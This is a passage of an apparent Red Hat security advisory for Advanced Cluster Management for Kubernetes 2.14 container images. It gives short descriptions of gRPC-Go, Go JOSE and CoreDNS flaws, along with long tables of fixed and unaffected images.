| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Moderate
A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.
9.1 (Critical)
Affected products
Fixed
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
25 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Important
A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.
7.5 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Important
A flaw was found in CoreDNS. An unauthenticated network attacker can exploit incorrect handling of TSIG (Transaction Signature) authentication in the gRPC, QUIC, DoH (DNS over HTTPS), and DoH3 transport implementations. This vulnerability allows an attacker to bypass TSIG protection, leading to unauthorized access to functionalities such as zone transfers and dynamic DNS updates. For DoH and DoH3, the issue is more severe as any request with a TSIG record is treated as authenticated, even with an invalid key.
7.5 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — | ||
